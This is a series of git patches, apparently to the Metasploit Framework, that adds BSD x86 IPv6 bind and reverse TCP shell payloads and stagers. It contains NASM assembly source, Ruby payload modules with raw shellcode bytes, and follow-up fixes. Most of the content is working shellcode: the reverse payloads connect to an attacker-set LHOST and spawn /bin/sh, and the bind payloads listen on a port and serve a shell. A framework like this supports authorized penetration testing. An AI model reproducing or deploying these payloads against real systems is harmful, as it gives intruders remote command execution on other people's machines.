From 7630ef17e33ae5888889a8615998a3e90ebc46a8 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:34:31 -0600 Subject: [PATCH 1/6] Add BSD IPv6 payloads (source only for now) --- external/source/shellcode/bsd/ia32/Makefile | 4 +- .../bsd/ia32/single_bind_tcp_shell_ipv6.asm | 36 ++++++ .../ia32/single_reverse_tcp_shell_ipv6.asm | 42 +++++++ .../bsd/ia32/stager_sock_bind_ipv6.asm | 108 ++++++++++++++++++ .../bsd/ia32/stager_sock_reverse_ipv6.asm | 95 +++++++++++++++ 5 files changed, 283 insertions(+), 2 deletions(-) create mode 100644 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm diff --git a/external/source/shellcode/bsd/ia32/Makefile b/external/source/shellcode/bsd/ia32/Makefile index be00e42cd3..71c7e56332 100644 --- a/external/source/shellcode/bsd/ia32/Makefile +++ b/external/source/shellcode/bsd/ia32/Makefile @@ -1,7 +1,7 @@ ASM=nasm -STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse +STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6 STAGES=stage_tcp_shell -SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock +SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6 OBJS=${STAGERS} ${STAGES} ${SINGLE} include ../../Makefile.incl diff --git a/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm new file mode 100644 index 0000000000..484d240008 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm @@ -0,0 +1,36 @@ +;; +; +; Name: single_bind_tcp_shell +; Version: $Revision: 1628 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Single portbind TCP shell. +; +; Meta-Information: +; +; meta-shortname=BSD Bind TCP Shell +; meta-description=Listen on a port and spawn a shell +; meta-authors=skape +; meta-os=bsd +; meta-arch=ia32 +; meta-category=single +; meta-connection-type=bind +; meta-name=bind_tcp_shell +; meta-basemod=Msf::PayloadComponent::BindConnection +; meta-offset-lport=0x8 +;; +BITS 32 + +%define USE_SINGLE_STAGE 1 + +%include "generic.asm" +%include "stager_sock_bind_ipv6.asm" + +shell: + execve_binsh EXECUTE_REDIRECT_IO diff --git a/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm new file mode 100644 index 0000000000..5b1d635428 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm @@ -0,0 +1,42 @@ +;; +; +; Name: single_reverse_tcp_shell +; Version: $Revision: 1626 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Single reverse TCP shell. +; +; Meta-Information: +; +; meta-shortname=BSD Reverse TCP Shell +; meta-description=Connect back to the attacker and spawn a shell +; meta-authors=skape +; meta-os=bsd +; meta-arch=ia32 +; meta-category=single +; meta-connection-type=reverse +; meta-name=reverse_tcp_shell +; meta-basemod=Msf::PayloadComponent::ReverseConnection +; meta-offset-lhost=0x0a +; meta-offset-lport=0x13 +;; +BITS 32 + +%define USE_SINGLE_STAGE 1 +%define ASSUME_REG_EAX 0 + +; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD +; clears edx. +; %define ASSUME_REG_EDX 2 + +%include "stager_sock_reverse_ipv6.asm" +%include "generic.asm" + +shell: + execve_binsh EXECUTE_REDIRECT_IO diff --git a/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm new file mode 100644 index 0000000000..196328405e --- /dev/null +++ b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm @@ -0,0 +1,108 @@ +;; +; +; Name: stager_sock_bind_ipv6 +; Qualities: Can Have Nulls +; Version: $Revision: 1628 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Implementation of a BSD portbind over IPv6 TCP stager. +; +; Meta-Information: +; +; meta-shortname=BSD Bind TCP Stager +; meta-description=Listen on a port for a connection and run a second stage +; meta-authors=skape , vlad902 , hdm +; meta-os=bsd +; meta-arch=ia32 +; meta-category=stager +; meta-connection-type=bind +; meta-name=bind_tcp_ipv6 +; meta-basemod=Msf::PayloadComponent::BindConnection +; meta-offset-lport=26 +;; +BITS 32 +GLOBAL main + +main: + +socket: + xor eax, eax + push eax ; Protocol: (IP=0) + inc eax + push eax ; Type: (SOCK_STREAM=1) + push byte 28 ; Domain: (PF_INET6=28) + push byte 97 + pop eax ; socket() + push eax ; padding + int 0x80 + mov ebx, eax ; save socket + + xor edx, edx + + push edx ; uint32_t sin6_scope_id; /* scope zone index */ + push edx ; struct in6_addr sin6_addr; /* IP6 address */ + push edx + push edx + push edx + push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */ + push dword 0xbfbf1c1c + ; in_port_t sin6_port; /* Transport layer port # */ + ; uint8_t sin6_len; /* length of this struct */ + ; sa_family_t sin6_family; /* AF_INET6 */ + + mov ecx, esp + +bind: + push byte 28 + push ecx + push eax + push byte 104 + pop eax + push eax ; padding + int 0x80 + +listen: + mov al, 106 + int 0x80 + +accept: + push edx + push ebx +%ifndef USE_SINGLE_STAGE + mov dh, 0x10 +%endif + push edx + mov al, 30 + int 0x80 + +%ifndef USE_SINGLE_STAGE + +read: + push ecx + push eax + push ecx +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + push byte 0x3 + pop eax + int 0x80 + ret + +%else + +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + +%endif diff --git a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm new file mode 100644 index 0000000000..8a181d4b65 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm @@ -0,0 +1,95 @@ +;; +; +; Name: stager_sock_reverse_ipv6 +; Qualities: Can Have Nulls +; Version: $Revision: 1626 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Implementation of a BSD reverse TCP stager over IPv6 +; +; File descriptor in edi. +; +; Meta-Information: +; +; meta-shortname=BSD Reverse TCP Stager +; meta-description=Connect back to the framework and run a second stage +; meta-authors=skape , vlad902 , hdm +; meta-os=bsd +; meta-arch=ia32 +; meta-category=stager +; meta-connection-type=reverse +; meta-name=reverse_tcp_ipv6 +; meta-basemod=Msf::PayloadComponent::ReverseConnection +; meta-offset-lhost=43 +; meta-offset-lport=36 +; meta-offset-scope=59 +;; +BITS 32 +GLOBAL main + +main: + +socket: + + xor eax, eax + push eax ; Protocol: (IP=0) + inc eax + push eax ; Type: (SOCK_STREAM=1) + push byte 28 ; Domain: (PF_INET6=28) + + push byte 97 + pop eax ; socket() + push eax ; padding + int 0x80 + jmp short bounce_to_connect + +connect: + pop ecx + push byte 28 + push ecx + push eax + +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + + push byte 98 + pop eax + push eax ; padding + int 0x80 + + jmp short skip_bounce + +bounce_to_connect: + call connect + +ipv6_address: + db 28 ; uint8_t sin6_len; /* length of this struct */ + db 28 ; sa_family_t sin6_family; /* AF_INET6 */ + dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */ + dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */ + dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */ + dd 0x48474645 + dd 0x4d4b4a49 + dd 0x51504f4e + dd 0 ; uint32_t sin6_scope_id; /* scope zone index */ + +skip_bounce: + +%ifndef USE_SINGLE_STAGE + +read: + mov al, 0x3 + mov byte [ecx - 0x3], 0x10 + int 0x80 + ret + +%endif From 45a785fde0d5e0a5a62640cb330e80e4ebef8a47 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:53:09 -0600 Subject: [PATCH 2/6] Adds BSD IPv6 payloads and stagers --- external/source/shellcode/Makefile.incl | 5 +- .../singles/bsd/x86/shell_bind_tcp_ipv6.rb | 52 +++++++++++++++ .../singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 57 ++++++++++++++++ .../payloads/stagers/bsd/x86/bind_ipv6_tcp.rb | 58 +++++++++++++++++ .../stagers/bsd/x86/reverse_ipv6_tcp.rb | 65 +++++++++++++++++++ 5 files changed, 235 insertions(+), 2 deletions(-) create mode 100644 modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb create mode 100644 modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb create mode 100644 modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb create mode 100644 modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb diff --git a/external/source/shellcode/Makefile.incl b/external/source/shellcode/Makefile.incl index a79dced9e7..ef771e44b5 100644 --- a/external/source/shellcode/Makefile.incl +++ b/external/source/shellcode/Makefile.incl @@ -1,2 +1,3 @@ -BUILDASM=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm -BUILDASMBSD=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm +BUILDASM=do echo -n "Building (ASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm + +BUILDASMBSD=do echo -n "Building (BSDASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb new file mode 100644 index 0000000000..bf167da40a --- /dev/null +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -0,0 +1,52 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Bsd + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BSD Command Shell, Bind TCP Inline (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection and spawn a command shell over IPv6', + 'Author' => ['skape', 'vlad902', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LPORT' => [ 26, 'n' ], + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\x89\xc3\x31" + + "\xd2\x52\x52\x52\x52\x52\x52\x68\x1c\x1c\xbf\xbf\x89\xe1\x6a\x1c" + + "\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0" + + "\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" + + "\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" + + "\x54\x53\x53\xb0\x3b\xcd\x80 + + } + )) + end + +end diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb new file mode 100644 index 0000000000..06faffaa6c --- /dev/null +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -0,0 +1,57 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Bsd + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BSD Command Shell, Reverse TCP Inline (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to attacker and spawn a command shell over IPv6', + 'Author' => [ 'skape', 'vlad902', 'hdm' ], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LHOST' => [ 43, 'ADDR' ], + 'LPORT' => [ 36, 'n' ], + 'SCOPEID' => [ 59, 'V' ] + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + + "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" + + "\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" + + "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" + + } + )) + register_options([ + OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) + ]) + end + +end diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb new file mode 100644 index 0000000000..0739922712 --- /dev/null +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -0,0 +1,58 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/bind_tcp' + + +### +# +# BindTcp +# ------- +# +# BSD bind TCP stager. +# +### +module Metasploit3 + + include Msf::Payload::Stager + + def self.handler_type_alias + "bind_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Bind TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection over IPv6', + 'Author' => ['skape', 'vlad902', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Stager' => + { + 'Offsets' => + { + 'LPORT' => [ 26, 'n' ], + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\x89\xc3\x31" + + "\xd2\x52\x52\x52\x52\x52\x52\x68\x1c\x1c\xbf\xbf\x89\xe1\x6a\x1c" + + "\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\xb6\x10" + + "\x52\xb0\x1e\xcd\x80\x51\x50\x51\x97\x6a\x03\x58\xcd\x80\xc3" + } + )) + end + +end diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..cf7df3b93c --- /dev/null +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -0,0 +1,65 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + + +### +# +# ReverseTcp +# ---------- +# +# BSD reverse TCP stager. +# +### +module Metasploit3 + + include Msf::Payload::Stager + + + def self.handler_type_alias + "reverse_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Reverse TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to the attacker over IPv6', + 'Author' => ['skape', 'vlad902', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ 43, 'ADDR' ], + 'LPORT' => [ 36, 'n' ], + 'SCOPEID' => [ 59, 'V' ] + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + + "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" + + "\xc6\x41\xfd\x10\xcd\x80\xc3" + } + )) + register_options([ + OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) + ]) + end + +end From aed27a2f82e130aa187faf56352f921d84bf40fc Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:54:29 -0600 Subject: [PATCH 3/6] Add missing trailing quote --- modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index bf167da40a..50005fb180 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -43,7 +43,7 @@ module Metasploit3 "\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0" + "\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" + "\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" + - "\x54\x53\x53\xb0\x3b\xcd\x80 + "\x54\x53\x53\xb0\x3b\xcd\x80" } )) From 29d8feaa24937c4e305d0da707eaf6c987c31345 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:58:08 -0600 Subject: [PATCH 4/6] Use the ADDR6 type, not ADDR --- modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 2 +- modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 06faffaa6c..8796b7acf9 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -35,7 +35,7 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR' ], + 'LHOST' => [ 43, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], 'SCOPEID' => [ 59, 'V' ] }, diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index cf7df3b93c..0e18bbd936 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -45,7 +45,7 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR' ], + 'LHOST' => [ 43, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], 'SCOPEID' => [ 59, 'V' ] }, From 0c2a18d765c526ba7c24b5c1355181dba1ce7e5c Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 01:41:24 -0600 Subject: [PATCH 5/6] Fix up reverse_tcp ipv6 stager for freebsd --- .../bsd/ia32/stager_sock_reverse_ipv6.asm | 33 ++++++++++++++----- .../singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 13 ++++---- .../stagers/bsd/x86/reverse_ipv6_tcp.rb | 12 ++++--- 3 files changed, 38 insertions(+), 20 deletions(-) diff --git a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm index 8a181d4b65..50071dc032 100644 --- a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm +++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm @@ -76,10 +76,10 @@ ipv6_address: db 28 ; sa_family_t sin6_family; /* AF_INET6 */ dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */ dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */ - dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */ - dd 0x48474645 - dd 0x4d4b4a49 - dd 0x51504f4e + dd 0 ; struct in6_addr sin6_addr; /* IP6 address */ + dd 0 + dd 0 + dd 0x01000000 ; default to ::1 dd 0 ; uint32_t sin6_scope_id; /* scope zone index */ skip_bounce: @@ -87,9 +87,26 @@ skip_bounce: %ifndef USE_SINGLE_STAGE read: - mov al, 0x3 - mov byte [ecx - 0x3], 0x10 - int 0x80 - ret + push byte 0x10 + pop edx + shl edx, 8 + sub esp, edx + mov ecx, esp ; Points to 4096 stack buffer + + push edx ; Length + push ecx ; Buffer + +%ifdef FD_REG_EBX + push ebx ; Socket +%else + push edi ; Socket +%endif + + push ecx ; Buffer to Return + + mov al, 0x3 + int 0x80 ; read(socket, &buff, 4096) + + ret ; Return %endif diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 8796b7acf9..2c548f85fd 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -35,18 +35,17 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR6' ], + 'LHOST' => [ 42, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], - 'SCOPEID' => [ 59, 'V' ] + 'SCOPEID' => [ 58, 'V' ] }, 'Payload' => "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + - "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + - "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + - "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" + + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" + "\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" + - "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" - + "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" } )) register_options([ diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index 0e18bbd936..1a67caf5ec 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -45,16 +45,18 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR6' ], + 'LHOST' => [ 42, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], - 'SCOPEID' => [ 59, 'V' ] + 'SCOPEID' => [ 58, 'V' ] }, 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + - "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + - "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" + - "\xc6\x41\xfd\x10\xcd\x80\xc3" + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" + + "\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" + + "\xc3" } )) register_options([ From 46d40b89a5ea05d0b125d012f88887dfd764548e Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 02:08:26 -0600 Subject: [PATCH 6/6] Make sure at least one character is returned --- lib/msf/core/exploit/postgres.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 3d9f8daea1..8b805d24ba 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -245,7 +245,7 @@ module Exploit::Remote::Postgres if datastore['PASSWORD'].to_s.size > 0 datastore['PASSWORD'].to_s else - 'INVALID_' + Rex::Text.rand_text_alpha(rand(6)) + 'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1) end end